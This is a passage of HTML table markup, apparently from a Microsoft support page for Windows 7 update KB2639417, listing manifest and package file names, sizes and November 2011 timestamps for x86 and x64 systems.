class=\"sbody-td\">X86_54f9830b5dfbe584cc365eb4e0d72ca4_31bf3856ad364e35_6.1.7601.21866_none_b0c4109ef6f3b462.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_e6bb1c633a80397320d17e389bc8fdb7_31bf3856ad364e35_6.1.7600.16920_none_0aaea0d21153d97c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_b905b957fbae27c2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:21</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_b94a7ef114fe729f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:23</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_bae14671f8dcaf9f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_bb507535120d3b46.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_74d86c10d10452a3743ae43b09539d17_31bf3856ad364e35_6.1.7600.16920_none_5722a410ab724a41.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_7b0773d126abef96929484e26a67350e_31bf3856ad364e35_6.1.7601.17730_none_9975b29df28fed78.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_7ddad16685d87477adb86abfb9208c3e_31bf3856ad364e35_6.1.7601.17730_none_ea0b830299b03835.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_8a3e064e710917bb05d489fbf816c5db_31bf3856ad364e35_6.1.7601.17730_none_cbcb63c5a1fd7ee8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_926678f7016626e47a8bb536262a41bc_31bf3856ad364e35_6.1.7600.21097_none_ac0fbd6391a8e4e0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_a0b06e36fc0e3802968c276ba76e3556_31bf3856ad364e35_6.1.7600.21097_none_09dc743827434fc9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_a0bc39a3cead58baeb5eb09378ae3475_31bf3856ad364e35_6.1.7601.21866_none_e370dec30cc6e1a9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_a2276a31acdc22b2fbabab381e073106_31bf3856ad364e35_6.1.7601.21866_none_57a71ae99b0f403b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_a41541c05e59aeaec493256ee31c5a4d_31bf3856ad364e35_6.1.7600.21097_none_ef8e59c56928601a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_b40bfc5a0b0f46bd8bf4963d9c741346_31bf3856ad364e35_6.1.7601.21866_none_71834d3285aed8db.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_b9d5caaa55e6b05a18b838c84ee0555b_31bf3856ad364e35_6.1.7600.16920_none_3cb0c7d4805673e8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_db68874f6aeb920a7f4b4137f287d04f_31bf3856ad364e35_6.1.7600.16920_none_418f3c763577979d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_152454dbb40b98f8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">08:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_15691a74cd5be3d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">08:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_16ffe1f5b13a20d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">08:09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_176f10b8ca6aac7c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">08:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,794</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,499</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,213</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,707</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,017</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,987</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,119</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,794</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,501</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,823</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,084</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,409</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr 